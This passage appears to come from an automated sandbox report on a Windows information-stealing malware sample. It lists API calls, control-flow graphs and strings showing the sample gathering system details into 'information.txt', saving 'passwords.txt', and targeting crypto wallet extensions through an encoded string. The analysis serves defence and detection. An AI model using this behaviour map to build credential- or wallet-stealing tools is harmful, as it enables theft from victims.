                                                                                                                                                                                            • Part of subcall function 00030DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00030E57
                                                                                                                                                                                            • Part of subcall function 00030DDB: LocalFree.KERNEL32(00000000), ref: 00030EFF
                                                                                                                                                                                            • Part of subcall function 00030D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00030D49
                                                                                                                                                                                            • Part of subcall function 00030D2E: HeapAlloc.KERNEL32(00000000), ref: 00030D50
                                                                                                                                                                                            • Part of subcall function 00030D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00030D5F
                                                                                                                                                                                            • Part of subcall function 00030D2E: wsprintfA.USER32 ref: 00030D7D
                                                                                                                                                                                            • Part of subcall function 00030F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C), ref: 00030F65
                                                                                                                                                                                            • Part of subcall function 00030F51: HeapAlloc.KERNEL32(00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030F6C
                                                                                                                                                                                            • Part of subcall function 00030F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ), ref: 00030F8A
                                                                                                                                                                                            • Part of subcall function 00030F51: RegQueryValueExA.KERNEL32(00056888,00000000,00000000,00000000,000000FF,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000), ref: 00030FA6
                                                                                                                                                                                            • Part of subcall function 00030F51: RegCloseKey.ADVAPI32(00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030FAF
                                                                                                                                                                                            • Part of subcall function 00031007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0003107D
                                                                                                                                                                                            • Part of subcall function 00031007: wsprintfA.USER32 ref: 000310DB
                                                                                                                                                                                            • Part of subcall function 00030FBA: GetSystemInfo.KERNEL32(?), ref: 00030FD4
                                                                                                                                                                                            • Part of subcall function 00030FBA: wsprintfA.USER32 ref: 00030FEC
                                                                                                                                                                                            • Part of subcall function 00031119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00056910,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 00031131
                                                                                                                                                                                            • Part of subcall function 00031119: HeapAlloc.KERNEL32(00000000), ref: 00031138
                                                                                                                                                                                            • Part of subcall function 00031119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00031154
                                                                                                                                                                                            • Part of subcall function 00031119: wsprintfA.USER32 ref: 0003117A
                                                                                                                                                                                            • Part of subcall function 000314A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00056712,?,?), ref: 000314D4
                                                                                                                                                                                            • Part of subcall function 000314A5: Process32First.KERNEL32(00000000,00000128), ref: 000314E4
                                                                                                                                                                                            • Part of subcall function 000314A5: Process32Next.KERNEL32(00000000,00000128), ref: 00031542
                                                                                                                                                                                            • Part of subcall function 000314A5: CloseHandle.KERNEL32(00000000), ref: 0003154D
                                                                                                                                                                                            • Part of subcall function 00031203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0005670F,00000000,?,?), ref: 00031273
                                                                                                                                                                                            • Part of subcall function 00031203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000312B0
                                                                                                                                                                                            • Part of subcall function 00031203: wsprintfA.USER32 ref: 000312DD
                                                                                                                                                                                            • Part of subcall function 00031203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000312FC
                                                                                                                                                                                            • Part of subcall function 00031203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00031332
                                                                                                                                                                                            • Part of subcall function 00031203: lstrlenA.KERNEL32(?), ref: 00031347
                                                                                                                                                                                            • Part of subcall function 00031203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00056E8C), ref: 000313DC
                                                                                                                                                                                            • Part of subcall function 00031203: RegCloseKey.ADVAPI32(?), ref: 00031446
                                                                                                                                                                                            • Part of subcall function 00031203: RegCloseKey.ADVAPI32(?), ref: 00031472
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00056910,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000), ref: 00034563
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                          • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                          • API String ID: 478979899-1014693891
                                                                                                                                                                                          • Opcode ID: c1f2cd068f3cf6e629bef7b76c28474f2f6b5d2d32a0041efb962abb8f229a79
                                                                                                                                                                                          • Instruction ID: 45457e8e9ec15665150db71a341853a98c1329041eed0fe1cdf9c239d032cc19
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1f2cd068f3cf6e629bef7b76c28474f2f6b5d2d32a0041efb962abb8f229a79
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62523C32D4152DAACF02FBA4EC539DEB7B9AF14304F914261BA1077167DB317E4A8B90
                                                                                                                                                                                          Function 0002884C Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 405memoryfilestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1774 2884c-28865 call 30795 1777 28867-2886c 1774->1777 1778 2886e-2887e call 30795 1774->1778 1779 28885-2888d call 30549 1777->1779 1783 28880 1778->1783 1784 2888f-2889f call 30795 1778->1784 1786 288a5-28922 call 304e7 call 31c4a call 30609 call 305c7 call 30609 call 305c7 call 3058d call 22920 * 5 1779->1786 1783->1779 1784->1786 1790 28d72-28d96 call 22920 * 3 call 21cde 1784->1790 1822 28939-28949 CopyFileA 1786->1822 1823 28924-28936 call 30519 call 322b0 1822->1823 1824 2894b-28984 call 304e7 call 30609 call 3058d call 22920 1822->1824 1823->1822 1837 28986-289d7 call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d 1824->1837 1838 289dc-28a5b call 30609 call 3058d call 22920 call 305c7 call 3058d call 22920 call 30609 call 3058d call 22920 call 305c7 call 30609 call 3058d call 22920 1824->1838 1871 28a60-28a79 call 22920 1837->1871 1838->1871 1880 28d4b-28d57 DeleteFileA call 22920 1871->1880 1881 28a7f-28a9a 1871->1881 1886 28d5c-28d6b call 22920 * 2 1880->1886 1888 28aa0-28ab6 GetProcessHeap RtlAllocateHeap 1881->1888 1889 28d37-28d4a 1881->1889 1901 28d6d call 22920 1886->1901 1892 28cda-28ce7 1888->1892 1889->1880 1899 28abb-28b9d call 304e7 * 6 call 21cfd call 30519 call 2826d StrCmpCA 1892->1899 1900 28ced-28cf9 lstrlenA 1892->1900 1937 28ba3-28bb6 StrCmpCA 1899->1937 1938 28d97-28dd9 call 22920 * 8 1899->1938 1900->1889 1902 28cfb-28d27 call 21cfd lstrlenA call 30519 call 36e97 1900->1902 1901->1790 1914 28d2c-28d32 call 22920 1902->1914 1914->1889 1940 28bc0 1937->1940 1941 28bb8-28bbe 1937->1941 1938->1901 1943 28bc6-28bde call 30549 StrCmpCA 1940->1943 1941->1943 1949 28be0-28be6 1943->1949 1950 28be8 1943->1950 1952 28bee-28bf9 call 30549 1949->1952 1950->1952 1957 28bfb-28c03 call 30549 1952->1957 1958 28c08-28cd5 lstrcatA * 14 call 22920 * 7 1952->1958 1957->1958 1958->1892
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030795: StrCmpCA.SHLWAPI(?,?,?,00028863,?,?,?), ref: 0003079E
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00028941
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 000322B0: _memset.LIBCMT ref: 000322D7
                                                                                                                                                                                            • Part of subcall function 000322B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0003237D
                                                                                                                                                                                            • Part of subcall function 000322B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0003238B
                                                                                                                                                                                            • Part of subcall function 000322B0: CloseHandle.KERNEL32(00000000), ref: 00032392
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx), ref: 00028AA6
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00028AAD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00028B95
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000571E8), ref: 00028BAB
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000571EC), ref: 00028BD3
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00028CF0
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00028D0B
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00028D4E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 00028AA0
                                                                                                                                                                                          • ERROR_RUN_EXTRACTOR, xrefs: 00028B8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                          • String ID: ERROR_RUN_EXTRACTOR$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 2819533921-1324677906
                                                                                                                                                                                          • Opcode ID: 7e234f0d561c716407000c1b7dfbd911cc825398783a2f03b2ac148a0b6fdeb8
                                                                                                                                                                                          • Instruction ID: f4550830a1974f1c5ecd9db81f2332a0c14db3463faa675439c8a2e1ce5bf83b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e234f0d561c716407000c1b7dfbd911cc825398783a2f03b2ac148a0b6fdeb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE10A32905129EFCF02BBA4FC4A9DE7B79AF04305F514060FA05BB162DB316E959FA1
                                                                                                                                                                                          Function 0002852E Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230stringmemoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 000285D3
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx), ref: 00028628
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002862F
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000286CB
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 000286E4
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 000286EE
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005719C), ref: 000286FA
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00028704
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571A0), ref: 00028710
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 0002871D
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00028727
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571A4), ref: 00028733
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00028740
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 0002874A
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571A8), ref: 00028756
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00028763
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 0002876D
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571AC), ref: 00028779
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571B0), ref: 00028785
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000287BE
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002880B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 00028622
                                                                                                                                                                                          • passwords.txt, xrefs: 000287CE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                          • String ID: passwords.txt$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 1956182324-901639034
                                                                                                                                                                                          • Opcode ID: c98aee81c2494a28922ef4a978c20e18706d3c39bbccfa24cd26158ce158a648
                                                                                                                                                                                          • Instruction ID: 75f5a2d08667e543324b3f9d304fc7b388f8719afcd90a71b18eac503acbea4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: c98aee81c2494a28922ef4a978c20e18706d3c39bbccfa24cd26158ce158a648
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8811932901218FBCF02BBA4FD0B9DE7B75AF08315F514090FA05B7162DB319E959BA5
                                                                                                                                                                                          Function 000369B6 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000368C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0003691A
                                                                                                                                                                                            • Part of subcall function 000368C6: lstrlenA.KERNEL32(?), ref: 00036925
                                                                                                                                                                                            • Part of subcall function 000368C6: StrStrA.SHLWAPI(00000000,?), ref: 0003693A
                                                                                                                                                                                            • Part of subcall function 000368C6: lstrlenA.KERNEL32(?), ref: 00036949
                                                                                                                                                                                            • Part of subcall function 000368C6: lstrlenA.KERNEL32(00000000), ref: 00036962
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036AA0
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036AF9
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036B59
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BB2
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BC8
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BDE
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BF0
                                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 00036BFF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
